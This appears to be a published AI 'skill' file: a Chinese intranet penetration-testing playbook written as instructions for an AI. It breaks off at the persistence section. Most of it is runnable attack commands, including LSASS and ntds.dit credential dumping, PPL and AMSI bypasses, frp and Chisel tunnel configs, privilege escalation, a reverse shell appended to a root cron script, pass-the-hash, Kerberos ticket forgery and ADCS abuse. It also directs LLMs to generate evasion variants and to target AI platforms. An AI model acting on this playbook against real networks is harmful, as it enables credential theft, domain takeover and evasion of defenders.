内网渗透测试深度技能
SkillAI & models内网渗透测试深度专业技能:本地信息收集与凭证窃取(mimikatz/LSASS/ntds.dit)、内网探测与隐藏隧道(frp/Chisel/DNS/ICMP)、Windows/Linux提权、横向移动矩阵(IPC/WMI/DCOM/PSEXEC)、AD域渗透与域控接管(Zerologon/Kerberoast/ADCS)、权限维持与痕迹清除、免杀与C2、AI大模型内网攻击面(Ollama/vLLM/向量数据库/RAG/MCP/Agent)、AI辅助红队作战(路径分析/免杀增强/自动化)
Available today. Use it from your connected AI after setup.
No other account needed.
Connect ahel once, and every AI you use reads what you have installed.
Then ask your AI: use the 内网渗透测试深度技能 skill
What this skill tells your AI
The instructions your AI receives, as published by langbyyi/cyberstrikeai-src in skills/intranet-penetration-testing/SKILL.md and read by ahel’s review.
AI LOAD INSTRUCTION: 内网渗透全链路专家打法。按已知前提:已获初始立足点。聚焦本地收集→凭据窃取→隧道→提权→横向→域渗透→维持的递进决策,域渗透细节由 active-directory-attack 细分包承接。维持/免杀类动作先过 authorized-attack-scope。
概述
内网渗透是攻防对抗的决胜战场——外网打点成功后,能否从一台主机走向整个内网、直至域控接管,取决于信息收集的深度、凭证获取的能力与攻击路径的规划。本技能以《安服内网渗透测试指南》为骨架,以资深攻防专家视角组织,覆盖本地信息收集→凭证窃取→内网探测→隐藏隧道→权限提升→横向移动→AD域渗透→权限维持→痕迹清除→免杀C2完整攻击链,并结合AI大模型能力补充两个前沿维度:AI大模型系统本身的内网攻击面(私有化LLM/Ollama/vLLM/向量数据库/RAG/MCP/Agent)与AI辅助红队作战(大模型驱动的信息分析、攻击路径规划、免杀增强与自动化)。
与network-penetration-testing技能(全流程攻击链概览)互补:本技能聚焦内网阶段的高频实操细节与当代高端对抗手法。
一、本地信息收集(打点后的第一站)
原则:先本地后网络,先凭证后提权。本地信息收集决定后续所有攻击路径的可行性,10分钟的系统化收集胜过盲目扫描。
1.1 网络/系统/软件/服务信息
ipconfig /all :: 网卡/网关/DNS(域判断关键)
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" :: OS版本与架构
echo %PROCESSOR_ARCHITECTURE% :: 架构(影响payload选择)
wmic product get name,version :: 安装软件清单(找可利用中间件)
wmic service list brief :: 服务列表(找错误配置/第三方服务)
tasklist /svc :: 进程与服务关联(杀软/EDR/AV)
wmic startup get command,caption :: 启动项(持久化线索/账密)
schtasks /query /fo LIST /v :: 计划任务(常藏连接账号密码)
net session :: 本机与客户端的会话
netstat -anto :: 端口/连接(判断出网/服务)
1.2 用户与会话
net user :: 本机用户列表
net localgroup administrators :: 本地管理员组(常含域用户)
query user :: 当前在线用户(RDP目标)
net user <username> :: 用户详情(上次登录时间等)
whoami /all :: 当前权限与令牌信息(提权线索)
wmic useraccount get name,sid,disabled :: SID与禁用状态
1.3 补丁/防火墙/共享/路由
wmic qfe get Caption,HotFixID,InstalledOn :: 补丁列表(缺哪补丁→对应漏洞)
netsh advfirewall show allprofiles :: 防火墙状态与规则
net share :: 本机共享(敏感共享泄露)
wmic share get name,path,status :: 共享列表
route print :: 路由表(发现其他网段)
arp -a :: ARP缓存(活跃主机/网关)
高级:
arp -a与route print是发现新网段的第一手情报——内网多网段边界机往往是跳板机的首选。
1.4 历史命令与登录记录
# Windows
# 每个用户的 .bash_history 类似物——PowerShell历史
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type %USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# Linux(含大量敏感账号密码/IP/服务配置)
history
cat ~/.bash_history
grep -iE "pass|pwd|ssh|mysql|redis|token|secret" ~/.bash_history
RDP/SSH 外连记录定位运维人员:
# Windows RDP外连记录(快速定位运维/管理员主机)
cmdkey /list # 保存的凭据(可离线解密)
# SharpEventLog: 读取本机所有登录本机的计算机记录
# 位置: 注册表 HKCU\Software\Microsoft\Terminal Server Client\Servers
reg query "HKCU\Software\Microsoft\Terminal Server Client\Default"
reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s
# Linux SSH
cat ~/.ssh/authorized_keys # 谁曾免密登录过
cat ~/.ssh/id_rsa* # 私钥(可复用登录其他主机)
lastlog && last -a # 登录IP历史
cat ~/.ssh/config /etc/ssh/ssh_config # 配置中的跳板/账号
1.5 杀软/EDR识别(决定免杀策略)
# 直接看进程
tasklist | findstr /i "360 kav avp mcshield egui safedog hws hipstray MsMpEng
Norton symantec cccen NISUN x64 sysdiag 火绒 安天 深信服 奇安信 天擎
QAX 微步 青藤 ossec alibaba aegis"
# 服务
wmic service get name,displayname,pathname | findstr /i "360 kav aegis"
# 驱动
driverquery /v | findstr /i "360 qutmips ysprotect sysdiag"
# PowerShell AMSI/CLM 状态
Get-MpComputerStatus 2>$null | Select RealTimeProtectionEnabled
决策链:识别杀软 → 判断有无EDR(是否有内核驱动/行为分析)→ 决定免杀强度与上线方式(进程注入/无文件/白利用)。
1.6 AI辅助信息收集分析
# 大模型快速处理原始输出:把 ipconfig/systeminfo/tasklist/wmic 输出丢给LLM,
# 让其标注: 1)可疑的高权限进程 2)可利用的第三方软件 3)缺失的关键补丁
# 4)网段关系图 5)杀软与免杀建议。省去人工逐行翻找的耗时。
# 典型提问示例(见第十三章AI辅助红队作战):
# "分析以下 systeminfo 输出,列出可能存在的提权漏洞(给出CVE编号)"
# "从这份 tasklist 中识别出所有安全软件及其类型(AV/EDR/HIPS)"
二、凭证窃取(密码是内网通行证)
内网渗透本质是凭证的收集与复用。一次抓取的明文密码/哈希可用于密码喷洒、撞库、PTH 与横向移动,价值远超单个系统权限。
2.1 Windows凭证窃取(mimikatz系列)
# 管理员/SYSTEM权限,先提权
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # sekurlsa::logonpasswords # 抓LSASS中登录凭据(明文+NTLM)
# Win10/2012R2+默认不存明文,开启WDigest后重启/重登可抓明文
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
LSASS 提取(mimikatz被拦时):
# Procdump(微软官方签名,白利用)
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
# comsvcs.dll(lolbin,无文件落地)
tasklist | findstr lsass
rundll32 C:\windows\system32\comsvcs.dll MiniDump <LSASS_PID> dump.bin full
# 本地离线解析
mimikatz "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
注册表离线转储(无需内存操作):
reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
reg save HKLM\SECURITY security.hiv
# 离线用 mimikatz lsadump::sam /sam:sam.hiv /system:system.hiv 解密本机hash
域控ntds.dit(一次获取全域hash):
# ntdsutil 快照
ntdsutil snapshot "active instance ntds" create quit quit
ntdsutil snapshot "mount {GUID}" quit quit
copy C:\$SNAP_xxx\windows\ntds\ntds.dit c:\temp\ntds.dit
# vssadmin 卷影
vssadmin create shadow /for=c:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\NTDS\ntds.dit c:\ntds.dit
# 离线解析(配合 SYSTEM hiv 解密hash)
secretsdump.py -ntds ntds.dit -system system.hiv LOCAL
绕过LSASS防护(LSA Protection/PPL):
# PPLdump(签名工具绕过PPL)
PPLdump64.exe <lsass_pid> lsass.dmp
# mimikatz + mimidriver 卸载PPL保护
mimikatz "!+" "!processprotect /process:lsass.exe /remove" privilege::debug sekurlsa::logonpasswords
# NanoDump: 免杀dump lsass(绕过AV)
nanodump.exe --write /tmp/lsass.dmp
2.2 Linux凭证窃取
# 内存明文(需root)
./mimipenguin # Kali/Ubuntu等
# shadow破解
unshadow /etc/passwd /etc/shadow > hash.txt && john hash.txt
# 环境变量/进程参数(常含密钥)
for p in /proc/[0-9]*/environ; do strings $p 2>/dev/null | grep -iE "pass|key|secret"; done
# 全盘搜索敏感信息
grep -rn "password=" /etc /home /root /var/www /opt 2>/dev/null
find / -iname "*.conf" -o -iname "*.properties" -o -iname "*.ini" 2>/dev/null | xargs grep -ilE "pass|secret|token"
2.3 常见软件/中间件凭证(一次性批量提取)
# 桌面软件凭据: Navicat/TeamViewer/FileZilla/WinSCP/Xshell/Xftp
SharpDecryptPwd.exe # uknowsec
# 浏览器密码/Cookie/历史
HackBrowserData.exe # moonD4rk(全平台)
BrowserGhost.exe /laZagne all # 奇安信QAX / LaZagne
SharpChromium.exe # Cookie+登录凭据
mimikatz dpapi::chrome /in:"%localappdata%\...\Login Data" /unprotect
# WiFi密码
SharpWifiGrabber.exe / netsh wlan show profiles <name> key=clear
# 向日葵(内网远控高发)
Sunflower_get_Password.exe # 识别码+验证码
# MSSQL各版本密码Hash
select name,password_hash from sys.sql_logins # 2008R2+
select name,password from master.dbo.sysxlogins # 2000
# Oracle/MySQL/Redis等弱口令+库内密码表(为撞库铺垫)
2.4 配置文件与数据库密文解密
# 中间件/应用配置(内网常见)
# Tomcat: WEB-INF/classes/{db,jdbc,config,application}.properties + conf/tomcat-users.xml
# WebLogic: Decrypt_Weblogic_Password(密文AES解密)
# 致远OA: /opt/Seeyon/A8/base/conf/datasourceCtp.properties
# 用友NC: /nchome/ierp/bin/prop.xml (ncDecode)
# 泛微OA: D:\WEAVER\ecology\WEB-INF\prop\weaver.properties
# ActiveMQ: /apache-activemq/conf/jetty-realm.properties
# 批量搜索明文敏感信息(Windows)
findstr /i /s /m "password" *.config *.ini *.xml *.properties *.yml *.yaml
# 搜索常见密钥文件
findstr /i /s /m "BEGIN RSA PRIVATE KEY\|BEGIN PRIVATE KEY" C:\*
2.5 云凭证
# SharpCloud: 检查 AWS/Azure/GCP 本地凭证文件
SharpCloud.exe
# 云元数据(若存在SSRF或本机可访问169.254.169.254)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ # AWS
curl http://169.254.169.254/metadata/instance/compute?api-version=2021-02-01 # Azure
# 云CLI配置
type %USERPROFILE%\.aws\credentials ; cat ~/.aws/credentials
# 容器/K8s:ServiceAccount Token
cat /var/run/secrets/kubernetes.io/serviceaccount/token
2.6 凭证利用优先级(决策链)
1. 明文密码 > NTLM哈希 > Kerberos票据 > 会话令牌
2. 抓到密码后立即做: 密码喷洒(低频) → 撞库(内网所有资产) → PTH(同口令复用)
3. 优先尝试: 域管/Domain Admin组 → 本地管理员组 → 运维账号(sa/root/administrator)
4. 工具: crackmapexec(密码喷洒) / fscan -m <protocol> -pwd <dict> / Hydra
三、内网网络信息收集
3.1 存活主机探测
:: 内置命令(不出网/无工具环境)
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="
:: NetBIOS(可拿到主机名/用户名/MAC)
nbtscan.exe 192.168.1.0/24
:: ARP扫描(本机同网段,快且不易被发现)
arp-scan -l / Invoke-ARPScan.ps1 -CIDR 192.168.1.0/20
:: nmap存活探测(大并发)
nmap -sP --min-hostgroup 1024 --min-parallelism 1024 -iL ip.txt -oG alive.txt
:: UDP关键口(53/137/161)扫存活
nmap -sU -p 53,137,161 192.168.1.0/24
3.2 端口扫描与服务识别
# 全端口快速(通过代理)
proxychains nmap -sT -Pn -p- --min-rate 2000 10.10.10.0/24 -oN full.txt
# 关键端口定向
nmap -sT -Pn -p 21,22,23,53,80,135,139,445,443,1433,1521,3306,3389,
5432,5900,6379,7001,8080,8443,9200,11211,2181,27017,5000,11434,19530 10.10.10.0/24
# 服务指纹
nmap -sT -Pn -sV -p 445,1433,3306,6379 10.10.10.10
# UDP服务(SNMP/Syslog等)
nmap -sU -sV -p 53,161,137,139,500,1617,1900 10.10.10.10
3.3 常见端口高危服务速查(内网横向重点)
| 端口 | 服务 | 攻击面 |
|---|---|---|
| 445/139 | SMB | MS17-010/SMBGhost、弱口令、未授权共享、PTH |
| 3389 | RDP | 弱口令、BlueKeep(CVE-2019-0708)、NLA绕过 |
| 22 | SSH | 弱口令、私钥复用、隧道代理 |
| 1433 | MSSQL | sa弱口令、xp_cmdshell提权、链接服务器 |
| 3306 | MySQL | 弱口令、UDF提权、未授权 |
| 6379 | Redis | 未授权RCE(写公钥/计划任务/主从复制) |
| 27017 | MongoDB | 未授权访问 |
| 9200 | Elasticsearch | 未授权、RCE(CVE-2015-1427) |
| 11211 | Memcached | 未授权、DRDoS反射 |
| 2181 | ZooKeeper | 未授权访问(配置/会话泄露) |
| 7001/7002 | WebLogic | 反序列化(T3/IIOP)、弱口令 |
| 8080/8089 | Tomcat/JBoss/Jenkins | 弱口令、反序列化、后台部署 |
| 1099 | Java RMI | 反序列化 |
| 873 | Rsync | 匿名访问、文件读取 |
| 50000 | SAP | 远程代码执行 |
| 8069 | Zabbix | 弱口令、监控命令执行 |
| 2181/9092 | Kafka | 未授权、消息窃取 |
| 11434 | Ollama | LLM服务未授权(见12.1) |
| 19530/8000 | 向量库/推理服务 | AI服务未授权(见12.1/12.2) |
3.4 综合扫描工具(内网渗透标配)
# fscan(最常用:存活+端口+弱口令+Web漏洞+MS17-010一站式)
fscan.exe -h 10.10.10.0/24 # 全模块
fscan.exe -h 10.10.10.0/24 -nobr -nopoc # 静默模式(减少流量)
fscan.exe -h 10.10.10.0/24 -m smb -pwd password # 指定模块/密码碰撞
fscan.exe -h 10.10.10.0/24 -rf id_rsa.pub # redis写公钥
fscan.exe -hf ip.txt -o result.txt # 批量导入+结果输出
# LadonGo(一键C/B/A段:存活/指纹/爆破/高危漏洞/远程执行)
Ladon 10.10.10.8/24 MS17010 ; Ladon 10.10.10.8/24 PortScan
# netspy(网段发现,适合大内网横向扩张)
netspy is # icmp全自动探测 10/172.16/192.168 段
netspy ts -p 22 -p 3389 # tcp探测
# Yasso(红队辅助工具集,含代理与并发)
Yasso.exe all -H 10.10.10.1/24
3.5 网段发现与扩张(高级)
# 网段来源:路由表、ARP缓存、DHCP分配、DNS记录(domain controllers)、
# 服务器多网卡、云VPC网段、容器网络(172.17.0.x/10.244.x.x)
# 多网段主机 = 跳板机首选
# 大内网:按 网关存活→B段/C段 逐层推进,先打管理网段(运维/堡垒机/监控)再打业务网段
# AI辅助:把路由表/ARP/探测结果给LLM生成网段拓扑图与推进顺序建议
四、隐藏通信隧道
4.1 连通性判断
# 分别测试各协议出网(内网边界/防火墙策略)
ping 8.8.8.8 # ICMP
curl -x http://<vps>:8080 http://example.com # HTTP(S)代理出网
nslookup <dnslog>.dnslog.cn <vps_ip> # DNS出网(仅53)
nc -vz <vps> 53 ; nc -vz <vps> 443 # TCP端口出网
# 判断进网:能否被外网直接访问(映射/公网IP/云负载均衡)
出网方式直接决定隧道选型:
能直连外网→frp/EW、仅HTTP(S)→reGeorg/Chisel、仅DNS→dnscat2/iodine、仅ICMP→icmpsh/ptunnel。
4.2 隧道工具矩阵
| 工具 | 场景 | 特征 |
|---|---|---|
| frp | 通用TCP/SOCKS代理,稳定 | 特征明显,需混淆/加壳 |
| Chisel | 单二进制,HTTP/WS封装,穿透性强 | 建议over WSS |
| Neo-reGeorg | WebShell环境(php/jsp/aspx) | 流量走HTTP隧道 |
| nps/pystinger | 多级代理/EDR环境(毒刺免杀好) | 支持内网级联 |
| EarthWorm(EW) | 老牌正向/反向/多级代理 | 静态特征多,慎用 |
| Venom | 多级代理+端口转发 | 模块化 |
| lcx | 端口转发(3389映射出网) | 明文,易被查杀 |
| SSH | -L/-R/-D 本地/远程/动态转发 | 有SSH入口首选 |
| netsh portproxy | Windows自带端口转发 | 无文件落地 |
| icmpsh/ptunnel | ICMP隧道 | 严格防火墙下保底 |
| dnscat2/iodine | DNS隧道 | 仅DNS出网 |
4.3 代理搭建实战
# frp SOCKS5
# frps.ini(服务端VPS)
[common]
bind_port = 7000
token = s3cr3t
# frpc.ini(内网主机)
[common]
server_addr = <vps>
server_port = 7000
token = s3cr3t
[socks5]
type = tcp
remote_port = 6000
plugin = socks5
# 本地使用
proxychains nmap -sT -Pn 10.10.10.0/24
# Chisel 反向代理(单文件,静态二进制,配合TLS混淆)
chisel server -p 8080 --reverse # VPS
chisel client wss://<vps>:8080 R:socks # 内网主机(WS封装过WAF)
# Neo-reGeorg(WebShell场景)
python neoreg.py generate -k password # 生成隧道脚本上传
python neoreg.py -k password -u http://target/tunnel.jsp -l 127.0.0.1 -p 1080
# SSH动态转发(有SSH权限时最优雅)
ssh -CfNg -D 1080 user@target
4.4 内网级联代理(多跳)
# 场景: A(边界) → B(核心网) → C(隔离网)
# 级联方式: B上跑二级frps → 本地proxychains链到B → B上proxychains链到C
# 或 pystinger/nps 支持的内网级联: agent→proxy→二级agent
# 工具链: frp多级 / nps / pystinger / ssh ProxyJump(-J)
ssh -J userA@A,userB@B userC@C -D 1080 # SSH JumpHost级联
4.5 隧道检测规避(攻防对抗视角)
- 尽量使用标准协议封装: WSS(Chisel)/DNS(iodine)/ICMP(icmpsh)
- 低频率小流量: 避开流量监控的"突发隧道"特征
- 端口复用: 走已开放的80/443/53端口
- 域前置/DNS over HTTPS 规避内容检测
- 定期轮换端口与证书,避免长期固定特征
- 避免使用已知静态签名的老工具(EW/lcx/cobaltstrike默认特征)
五、Windows权限提升
5.1 BypassUAC
# 场景: 本地管理员账号但UAC限制(高权限命令被拦)
# 手法: IFileOperation COM / eventvwr.exe注册表劫持 / sdclt.exe /
# SilentCleanup(磁盘清理任务) / cmstp.exe / 环境变量劫持高权限.NET程序
# 工具: UACME(Akagi64) / SharpBypassUAC / Bypass-UAC(FuzzySecurity)
UACME\Akagi64.exe 23 # 常用UAC绕过payload编号
5.2 内核漏洞提权
# 依据systeminfo补丁列表 → 匹配未修补CVE
# 常用: CVE-2020-1472(Zerologon,域控) / CVE-2021-21551(dell驱动) /
# PrintNightmare CVE-2021-34527(打印服务) / CVE-2022-21999(SpoolFool)
# 工具集: Kernelhub / Windows-Exploits / windows-exploit-suggester
python windows-exploit-suggester.py -d 2021-01-01-db -i systeminfo.txt
5.3 服务与数据库提权
# 数据库提权(内网高发)
# MSSQL: sa弱口令 → xp_cmdshell / CLR / 代理作业
EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE
EXEC master..xp_cmdshell 'whoami'
# MySQL: UDF提权(需写权限+plugin目录) / 日志getshell / 弱口令
# Oracle: oracleShell / JavaSource(高权限DBMS_JAVA)
# 工具: SharpSQLTools / MDUT / Sylas
# 服务配置提权
# 可写服务路径 → 替换服务二进制/放恶意DLL
wmic service get name,pathname | findstr /i "c:\\program files"
# 未引号服务路径
wmic service get name,pathname | findstr /v "C:\\Windows\\system32" | findstr /v /i "c:\\program"
# 可写注册表服务键 / 可写文件路径服务
5.4 错误配置提权
# 可写文件/文件夹 + SYSTEM运行的服务
icacls "C:\Program Files\xxx" # Everyone:(F) 等
# 计划任务可写脚本
schtasks /query /fo LIST /v | findstr /i "task run as"
# 任意用户以SYSTEM安装MSI(AlwaysInstallElevated)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
msfvenom -p windows/x64/meterpreter/reverse_tcp -f msi -o evil.msi
# 服务令牌提升 SeImpersonatePrivilege(见5.5)
5.5 Potato家族提权(SeImpersonatePrivilege)
# whoami /priv 查看: SeImpersonatePrivilege/SeAssignPrimaryTokenPrivilege → Potato
# Windows Server 2016/2019 + 高版本: PrintSpoofer / GodPotato / EfsPotato / SweetPotato
# (RottenPotato/JuicyPotato已不适用于新系统)
PrintSpoofer.exe -i -c cmd.exe
GodPotato -cmd "cmd /c whoami"
# 域控提权漏洞(CVE): noPac(CVE-2021-42278/42287) / Zerologon(CVE-2020-1472) 见第八章
5.6 提权自动化与AI辅助
# 自动枚举: WinPEAS / PowerUp / PrivescCheck / BeRoot
winpeas.exe quiet
. .\PowerUp.ps1; Invoke-AllChecks
# AI辅助: 把WinPEAS输出粘贴给LLM → 让它按可利用性排序并给出利用链
六、Linux权限提升
6.1 内核提权
uname -a && cat /etc/os-release
# 常见: CVE-2021-4034(Polkit pkexec,通杀) / CVE-2021-3156(sudo Baron Samedit) /
# CVE-2022-0847(Dirty Pipe) / CVE-2023-4911(GLIBC Looney Tunables) /
# CVE-2024-1086(nf_tables UAF)
# 工具: linux-exploit-suggester(les.sh) / linux-smart-enumeration(lse.sh)
./les.sh
6.2 SUID/计划任务/Cron
find / -perm -4000 -type f 2>/dev/null # SUID(gtfobins核对)
find / -perm -2000 -type f 2>/dev/null # SGID
ls -alh /var/spool/cron* /etc/cron* /etc/crontab # 可写Cron脚本→命令注入
cat /etc/cron.d/* /etc/at.allow /etc/at.deny
# 可写脚本被root执行 → 反弹shell
echo 'bash -i >& /dev/tcp/<vps>/4444 0>&1' >> /usr/local/bin/backup.sh
6.3 错误配置与明文凭证
# 可写敏感文件 / 弱权限服务配置
cat /etc/passwd | grep -v nologin # 可登录用户
sudo -l # 当前sudo权限
ls -la /etc/shadow /etc/sudoers # 弱权限
grep -rE "password|passwd|secret" /home /var/www /opt /etc/init.d 2>/dev/null
# Docker组 / 特权容器 / K8s SA(见container-security-testing技能)
docker run -v /:/mnt --rm -it alpine chroot /mnt sh # docker组提权
七、横向移动矩阵
7.1 内网脆弱面(横向第一波)
# 顺序: 弱口令爆破 → 未授权访问 → 中间件RCE → MS17-010 → 密码撞库
# 弱口令: SSH/RDP/MSSQL/MySQL/Redis/Oracle/VNC/SMB/PostgreSQL
# 未授权: Redis / MongoDB / Elasticsearch / Memcached / ZooKeeper / Kafka / Hadoop YARN
# 中间件RCE: WebLogic(T3/IIOP) / JBoss / Tomcat部署 / Jenkins / ActiveMQ
# 批量自动化: fscan -nobr -nopoc 快速摸底, 再对结果定点利用
# 撞库: 用已获取的密码库批量碰撞所有资产(同口令复用率极高)
7.2 Windows远程执行技术(横向核心)
# IPC$ 建立连接
net use \\10.10.10.10\ipc$ "password" /user:domain\user
# 计划任务执行(老系统)
copy mu.exe \\10.10.10.10\C$ ; at \\10.10.10.10 15:15 C:\mu.exe
# schtasks(新系统)
schtasks /create /s 10.10.10.10 /tn test /sc onstart /tr c:\mu.exe /ru system /f
schtasks /run /s 10.10.10.10 /i /tn test
# PSEXEC(释放psexesvc服务,特征明显)
psexec \\10.10.10.10 -accepteula -u user -p pass cmd.exe
# impacket-psexec / smbexec (Python版,服务名可自定义混淆)
python3 psexec.py domain/user:pass@10.10.10.10
python3 smbexec.py domain/user:pass@10.10.10.10 -service-name 5A1n6
# WMI(无回显,配合IPC写文件读结果)
wmic /node:10.10.10.10 /user:admin /password:pass process call create "cmd.exe /c ipconfig > ip.txt"
wmiexec.py domain/user:pass@10.10.10.10
# DCOM(免上传文件)
$com=[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.10"))
$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null," /c calc.exe","")
# WinRM(5985/5986,走HTTP)
evil-winrm -i 10.10.10.10 -u user -p pass
# 哈希传递PTH(拿到NTLM后无需明文)
crackmapexec smb 10.10.10.0/24 -u admin -H <ntlm_hash> --exec-method smbexec -x whoami
psexec.py -hashes :<ntlm_hash> domain/admin@10.10.10.10
7.3 Bypass AMSI
# 场景: PowerShell被AMSI拦截 → 横向脚本无法执行
# 1) 降级PS2.0(老系统)
powershell -version 2 -nop -c "IEX (...)"
# 2) 内存Patch AmsiScanBuffer(常见bypass脚本)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# 3) 注册表禁用(高权限)
Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\Script\Settings -Name AmsiEnable -Value 0
# 4) 反射加载绕过(流量混淆+内存Patch), 工具: AMSI.fail在线生成变体
# AI辅助: 让LLM生成多种AMSI bypass变体用于AV/EDR测试(见11.3)
7.4 利用运维通道(高价值横向)
# 补丁服务器/软件分发: 投递恶意更新包或替换安装源
# EDR主控端: 若攻陷EDR管理端 → 全内网定向下发执行(隐蔽且高权限)
# 堡垒机: 堡垒机失守 = 全内网运维通道沦陷(需先拿堡垒机密码库)
# 跳板机/运维终端: 常保存大量运维账号与免密通道
# 监控平台(Zabbix/Prometheus/Grafana): 命令执行/配置注入
# 虚拟化平台(vCenter/ESXi/Proxmox/K8s): 见7.5
# 注意: 上述路径动静极大,先评估攻击噪音再决策
7.5 虚拟化/监控/邮件平台后渗透
# vCenter(拿到root后):
# 1) 从 data.mdb 提取IdP证书伪造SAML管理员cookie
# (Linux: /storage/db/vmware-vmdir/data.mdb ; Win: C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb)
# vcenter_ExtraCertFromMdb.py → vcenter_GenerateLoginCookie.py
# 2) 通过快照/虚拟机内存取证dump凭证 → PTH
# 3) CVE-2021-21972/21985等未授权RCE
# Zabbix: 弱口令 → 监控项命令执行(Server权限)
# Exchange: ProxyLogon(2021-26855)/ProxyShell链/Exchange2domain/NtlmRelayToEWS(横向至域管)
# → 可读邮箱、重置域用户密码、滥用Exchange写ACL
7.6 AI大模型平台横向(新战场)
# 内网AI平台往往集中部署 GPU 算力 + 敏感训练/推理数据,攻击价值极高:
# 1) 未授权LLM服务(Ollama/vLLM/LM Studio) → 直接调用推理/拉模型(见12.1)
# 2) 向量数据库未授权 → 全量导出RAG知识库(内部文档/源码/凭证)(见12.2)
# 3) AI平台后台弱口令(Dify/FastGPT/Langflow/MaxKB) → 管理所有知识库与模型
# 4) MCP/Agent服务暴露 → 工具调用滥用(文件/数据库/内网HTTP)(见12.3)
# 5) 模型文件本身: 从存储/备份拉取权重与微调数据
八、AD域渗透
8.1 域信息收集
ipconfig /all :: 主DNS后缀=域名
nslookup <domain> :: 与DNS同IP即域控
net time /domain :: 存在域则返回域控名
net view /domain :: 域列表
net view /domain:XXX :: 域内计算机
net group "domain controllers" /domain :: 域控列表
net user /domain :: 域用户列表
net localgroup administrators :: 本地管理员组(含域账号)
wmic useraccount get /all :: 域用户详情
dsquery user -limit 0 :: 全量用户
nltest /DCLIST:XXX :: 域控机器名
高级枚举(BloodHound 数据采集):
# SharpHound 采集(全量关系图)
SharpHound.exe -c All --zipfilename bh.zip
# 分析: 导入BloodHound → 查找 "Shortest Path to Domain Admins"
# AI辅助: 把SharpHound结果/cypher查询结果给LLM解释攻击路径(见13.1)
8.2 获取域控方法(攻击路径优先级)
| 方法 | 原理 | 工具 |
|---|---|---|
| DCSync | 域管/复制权限 → 拉取全域hash | mimikatz lsadump::dcsync / impacket secretsdump |
| Zerologon(CVE-2020-1472) | 重置域控机器密码 → 直接接管 | mimikatz/impacket |
| noPac(CVE-2021-42278/42287) | SAM-Account-Name混淆 → 域管票据 | noPac.py / sam-the-admin |
| Kerberoast | 服务账户SPN票证离线破解 | GetUserSPNs + hashcat -m 13100 |
| AS-REP Roasting | 无预认证用户离线破解 | GetNPUsers.py + hashcat -m 18200 |
| GPP(组策略偏好) | SYSVOL中cpassword AES可解 | gpp-decrypt |
| 委派滥用 | 无约束/约束/资源委派 | Rubeus / impacket |
| SSP截获 | 域控上注入SSP抓明文 | mimikatz misc::memssp |
| 票据投递PTT | 域管票据注入 | Rubeus ptt / mimikatz kerberos::ptt |
| Exchange ACL | 高权限组写ACL(WriteDacl) | Exchange ADSync / PrivExchange |
8.3 Kerberos高级攻击
# Kerberoasting(服务账户爆破)
python3 GetUserSPNs.py -request domain/user:pass -outputfile hash.txt
hashcat -m 13100 hash.txt wordlist.txt
# AS-REP Roasting(不需要密码)
python3 GetNPUsers.py domain/ -usersfile users.txt -format hashcat -outputfile asrep.txt
hashcat -m 18200 asrep.txt wordlist.txt
# 委派滥用(约束委派→域管)
python3 findDelegation.py domain/user:pass
python3 getST.py -spn cifs/DC.domain domain/user:pass -impersonate administrator -dc-ip <DC>
python3 wmiexec.py -k -no-pass domain/administrator@DC.domain
# 黄金票据(需要krbtgt hash,伪造任意用户)
mimikatz "kerberos::golden /user:administrator /domain:xxx /sid:xxx /krbtgt:<hash> /ptt"
# 白银票据(服务票据伪造,免接触KDC)
mimikatz "kerberos::golden /user:xxx /service:cifs /target:DC /rc4:<hash> /ptt"
# 票据传递PTT
Rubeus.exe ptt /ticket:<base64>
8.4 ADCS/ACL/GPO滥用(当代主流)
# ADCS(证书服务) ESC1-ESC8: 配置不当CA签发高权限证书
certipy find -u user@domain -p pass -dc-ip <DC> -vulnerable
# ESC1: 用户可请求任意SAN证书 → 冒充域管
certipy req -u user@domain -p pass -ca CA-NAME -target <CA> -template ESC1 -upn administrator@domain
certipy auth -pfx admin.pfx -dc-ip <DC>
# ACL滥用: GenericAll/WriteDacl/ForceChangePassword → 提权/接管
bloodyAD -d domain -u user -p pass add genericAll user2:target
python3 dacledit.py -action write -rights GenericAll -principal user -target 'Domain Admins' domain/user:pass
# GPO滥用: 创建/修改GPO → 下发计划任务/脚本全域执行
# (需具有GPO编辑权限,SharpGPOAbuse)
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount victim --GPOName "Default Domain Policy"
# 常见错误配置: gMSA密码、SPN账户、MachineAccountQuota(默认10,可机器账户→ESC)
8.5 域内后渗透与域管定位
# 域管定位(找域管登录过的主机)
psloggedon.exe \\10.10.10.10 /l
# BloodHound: Shortest Path to Domain Admins / 高价值目标(备份/管理主机)
# 获取域管hash后: 全域PTH/PTT清扫 → 逐台登录拿SYSTEM → 全域拿下
# 域管hash破解优先级: krbtgt(金票) > 域管组成员 > 服务账户
# 域内敏感信息: SYSVOL脚本、共享文件、邮件、备份文件(常含明文密码)
# AI辅助: 汇总所有收集结果 → LLM生成"域管接管最短路径"作战方案
九、权限维持
9.1 Windows持久化
# 用户态: 注册表Run键 / 计划任务 / 启动文件夹 / WMI事件订阅 / DLL劫持
